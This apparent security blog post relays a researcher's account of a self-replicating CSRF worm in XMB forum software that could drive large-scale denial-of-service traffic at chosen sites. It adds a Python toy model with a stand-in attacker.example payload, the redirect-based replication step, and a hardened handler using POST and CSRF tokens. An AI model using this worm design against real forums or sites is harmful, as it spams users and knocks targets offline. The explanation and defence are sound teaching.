Our innocent little Warhol worm has begun making its rounds. There are some serious additional implications that have not been thought through completely. One thing that unsticky brought to my attention was the use of a Warhol worm for spamming. He correctly diagnoses a problem in myyearbook.com but then takes it a step further and describes what it would take to build a Warhol XSS worm.
This is actually a pretty interesting read if you aren’t already familiar with how it would work:
While I was once again wasting my time and life on myyearbook, I found that their forum software, XMB, accepted GET requests to make replies or new threads, which can be forced via an image tag. So I played around with it, and forced some random and useless spam from unsuspecting users, all the while thinking about how it could truly be exploited. Then it hit me: why not point an image tag to a remote PHP script, instead of just to the posting script? That way, you can have your script generate new code and forward the viewer back to the posting script, creating a post containing the code to repost once again. So now I’ve created a forum worm that can do wonders like spam… and advertise. So I started thinking about what else I could do, then once again, an epiphany. What if that technique were coupled with another image tag pointing to a separate PHP script? This time, the script would redirect the viewer’s GET request to a large page on a victim site. For every X views the ‘infected’ threads got, the victim page got just the same. On a single forum, this wouldn’t be a problem, really in any sense of the word. But after a quick Google search, I found there were over 2 million forums running the same vulnerable forum software. Even with the far under-estimated guess of a total of 10 views for each forum, that’s still a good 20 million requests sent to the victim site in a very short amount of time, basically within hours. But keep in mind this is a worm, and won’t be making just one post; it’ll be making as many posts as it gets views. An exponential increase of requests sent to our victim page. I severely doubt there’s really a single server running that would be able to handle that kind of traffic. Once the original target goes down, we’re left with dead links in all our posts… or so you’d think. Back to that idea on using a PHP script to direct the users.
This would allow you to have a list of targets, and cycle through them, as long as your scripts and ‘infected’ threads remained up. Of course, all this raises the problem of getting servers that would be able to handle the traffic generated by both the spreading of the worm and the requests for the script to divvy out the DoS traffic. This could easily be taken care of with a large number of hosted scripts, and checks inside each of them to see which scripts were still up and which weren’t. If a script died, no more posts pointing to it would be made. Sort of scary to think such a relatively small flaw could be turned into something so much larger and far more destructive. In a sense, an attacker could use this to knock out any sites of his or her choosing, and keep them down…
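The mechanics unsticky describes above come down to one root cause: the forum's posting script accepts a state-changing GET, so any page the victim's browser renders (including a forum post) can make the victim post. Below is an added example, written for this page and not code from unsticky or from XMB, that models a victim browser rendering an image tag, the attacker's redirect script bouncing that GET onto the forum's posting URL with the same image tag as the message (the self-replicating step), and the forum's reply handler in two versions: one that takes any method, and one that requires POST plus a per-session CSRF token. Host names (attacker.example, forum.example), script names (worm.php, post.php) and the `Request`/`Forum` helpers are placeholders assumed for the example.

```python
"""Toy model of a GET-based forum CSRF worm and the fix for it.

All hosts, paths and data here are constructed for illustration; they are
not taken from XMB, myyearbook.com or any real deployment.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlencode, urlsplit

ATTACKER_HOST = "attacker.example"   # placeholder host for the redirect script
FORUM_HOST = "forum.example"         # placeholder host for the forum

# The self-replicating payload: a post whose content is just an image tag
# pointing at the attacker's redirect script (constructed for this example).
WORM_PAYLOAD = f'<img src="http://{ATTACKER_HOST}/worm.php">'


@dataclass
class Request:
    method: str
    host: str
    path: str
    params: dict     # query string (GET) or form body (POST)
    cookies: dict    # whatever the browser attaches for this host


@dataclass
class Forum:
    sessions: dict = field(default_factory=dict)     # session id -> username
    csrf_tokens: dict = field(default_factory=dict)  # session id -> token
    posts: list = field(default_factory=list)        # (username, message)

    def login(self, user):
        sid = secrets.token_hex(16)
        self.sessions[sid] = user
        self.csrf_tokens[sid] = secrets.token_hex(16)  # issued once per session
        return sid

    def _user(self, req):
        return self.sessions.get(req.cookies.get("sid"))

    def reply_vulnerable(self, req):
        """XMB-style handler: any method with a valid session cookie posts."""
        user = self._user(req)
        if user is None or req.params.get("action") != "reply":
            return False
        self.posts.append((user, req.params.get("message", "")))
        return True

    def reply_hardened(self, req):
        """Require POST and a token tied to the session; an <img> can do neither."""
        user = self._user(req)
        if user is None or req.params.get("action") != "reply":
            return False
        if req.method != "POST":
            return False  # image tags only ever produce GETs
        expected = self.csrf_tokens[req.cookies["sid"]]
        supplied = req.params.get("token", "")
        if not hmac.compare_digest(expected, supplied):
            return False  # forged cross-site form without the token
        self.posts.append((user, req.params.get("message", "")))
        return True


def worm_php(req):
    """Attacker's redirect script: answer the image GET with a 302 whose
    Location is the forum's posting URL carrying the worm payload."""
    query = urlencode({"action": "reply", "tid": "1", "message": WORM_PAYLOAD})
    return 302, f"http://{FORUM_HOST}/post.php?{query}"


def browser_loads_image(img_url, forum, cookie_jar, hardened):
    """Model a victim browser rendering <img src=img_url>: GET the URL, follow
    one redirect, and attach the cookies stored for each host. Returns True
    if the forum ended up creating a post on the victim's behalf."""
    url = img_url
    for _ in range(2):  # the initial fetch plus at most one redirect
        parts = urlsplit(url)
        params = {k: v[0] for k, v in parse_qs(parts.query).items()}
        req = Request("GET", parts.hostname, parts.path, params,
                      cookie_jar.get(parts.hostname, {}))
        if parts.hostname == ATTACKER_HOST:
            _status, url = worm_php(req)   # browser follows the 302 silently
            continue
        if parts.hostname == FORUM_HOST:
            handler = forum.reply_hardened if hardened else forum.reply_vulnerable
            return handler(req)
    return False


if __name__ == "__main__":
    forum = Forum()
    sid = forum.login("victim")
    jar = {FORUM_HOST: {"sid": sid}}   # victim is logged in to the forum
    print("vulnerable:", browser_loads_image(WORM_PAYLOAD[10:-2], forum, jar, hardened=False), forum.posts)
    print("hardened:  ", browser_loads_image(WORM_PAYLOAD[10:-2], forum, jar, hardened=True))
```

Two things worth noting from the model. First, the new post's message is byte-for-byte the same image tag, which is exactly the replication step unsticky describes: every view of an infected thread produces another infected post. Second, a Referer check would not have saved the forum here, because the image request originates from the forum's own thread page and browsers keep that Referer across the attacker's redirect; rejecting GET for state changes and checking a session-bound token is what closes the hole.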